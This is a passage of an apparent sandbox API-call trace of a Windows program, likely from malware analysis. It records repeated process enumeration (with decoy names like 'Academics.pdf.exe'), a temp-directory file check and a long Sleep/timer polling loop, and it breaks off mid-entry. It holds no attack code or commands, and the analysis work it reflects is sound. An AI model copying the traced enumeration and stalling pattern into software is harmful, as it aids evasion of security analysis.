th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0290.060] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0290.061] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0290.061] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0290.062] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.063] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0290.064] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0290.065] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0290.066] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0290.067] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0290.068] CloseHandle (hObject=0x294) returned 1 [0290.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0290.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0290.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0290.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0290.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0290.068] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.068] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0290.068] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.068] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0290.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0290.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0290.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0290.069] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0290.069] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0290.069] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0290.071] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0290.072] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0290.073] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0290.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.074] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0290.075] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0290.076] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0290.077] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0290.078] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0290.079] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0290.096] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0290.096] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0290.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0290.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0290.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0290.096] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0290.096] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0290.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0290.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0290.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0290.097] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0290.097] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0290.097] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0290.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1768 [0290.098] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0290.098] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4a8 [0290.098] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0290.099] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0290.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0290.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0290.099] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0290.099] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0290.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0290.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0290.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0290.100] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0290.100] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0290.100] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0290.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0290.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0290.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0290.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0290.101] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0290.101] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0290.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0290.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0290.101] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0290.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0290.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0290.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0290.103] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0290.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0290.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0290.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0290.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0290.103] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0290.103] timeGetTime () returned 0x488ae [0290.103] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.103] Sleep (dwMilliseconds=0xa) [0290.113] timeGetTime () returned 0x488bd [0290.114] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.114] Sleep (dwMilliseconds=0xa) [0290.129] timeGetTime () returned 0x488cd [0290.129] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.129] Sleep (dwMilliseconds=0xa) [0290.145] timeGetTime () returned 0x488dd [0290.145] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.145] Sleep (dwMilliseconds=0xa) [0290.161] timeGetTime () returned 0x488ec [0290.161] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.161] Sleep (dwMilliseconds=0xa) [0290.176] timeGetTime () returned 0x488fc [0290.176] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.176] Sleep (dwMilliseconds=0xa) [0290.192] timeGetTime () returned 0x4890b [0290.192] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.192] Sleep (dwMilliseconds=0xa) [0290.207] timeGetTime () returned 0x4891b [0290.207] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.207] Sleep (dwMilliseconds=0xa) [0290.223] timeGetTime () returned 0x4892b [0290.223] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.223] Sleep (dwMilliseconds=0xa) [0290.239] timeGetTime () returned 0x4893a [0290.240] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.240] Sleep (dwMilliseconds=0xa) [0290.254] timeGetTime () returned 0x4894a [0290.254] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.254] Sleep (dwMilliseconds=0xa) [0290.270] timeGetTime () returned 0x48959 [0290.270] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.270] Sleep (dwMilliseconds=0xa) [0290.285] timeGetTime () returned 0x48969 [0290.285] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.286] Sleep (dwMilliseconds=0xa) [0290.301] timeGetTime () returned 0x48979 [0290.301] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.301] Sleep (dwMilliseconds=0xa) [0290.316] timeGetTime () returned 0x48988 [0290.316] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.317] Sleep (dwMilliseconds=0xa) [0290.333] timeGetTime () returned 0x48998 [0290.333] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.333] Sleep (dwMilliseconds=0xa) [0290.349] timeGetTime () returned 0x489a7 [0290.349] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.349] Sleep (dwMilliseconds=0xa) [0290.363] timeGetTime () returned 0x489b7 [0290.363] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.363] Sleep (dwMilliseconds=0xa) [0290.380] timeGetTime () returned 0x489c7 [0290.380] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.380] Sleep (dwMilliseconds=0xa) [0290.394] timeGetTime () returned 0x489d6 [0290.395] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.395] Sleep (dwMilliseconds=0xa) [0290.412] timeGetTime () returned 0x489e6 [0290.412] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.412] Sleep (dwMilliseconds=0xa) [0290.428] timeGetTime () returned 0x489f5 [0290.428] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.428] Sleep (dwMilliseconds=0xa) [0290.445] timeGetTime () returned 0x48a05 [0290.445] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.445] Sleep (dwMilliseconds=0xa) [0290.457] timeGetTime () returned 0x48a15 [0290.458] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.458] Sleep (dwMilliseconds=0xa) [0290.474] timeGetTime () returned 0x48a24 [0290.474] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.474] Sleep (dwMilliseconds=0xa) [0290.488] timeGetTime () returned 0x48a34 [0290.488] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.488] Sleep (dwMilliseconds=0xa) [0290.504] timeGetTime () returned 0x48a43 [0290.504] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.504] Sleep (dwMilliseconds=0xa) [0290.519] timeGetTime () returned 0x48a53 [0290.520] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.520] Sleep (dwMilliseconds=0xa) [0290.535] timeGetTime () returned 0x48a63 [0290.535] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.535] Sleep (dwMilliseconds=0xa) [0290.550] timeGetTime () returned 0x48a72 [0290.550] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0290.550] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0290.551] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0290.551] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0290.551] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0290.551] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.551] Sleep (dwMilliseconds=0xa) [0290.566] timeGetTime () returned 0x48a82 [0290.566] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.566] Sleep (dwMilliseconds=0xa) [0290.582] timeGetTime () returned 0x48a91 [0290.582] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.582] Sleep (dwMilliseconds=0xa) [0290.597] timeGetTime () returned 0x48aa1 [0290.597] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0290.597] Sleep (dwMilliseconds=0xa) [0290.613] timeGetTime () 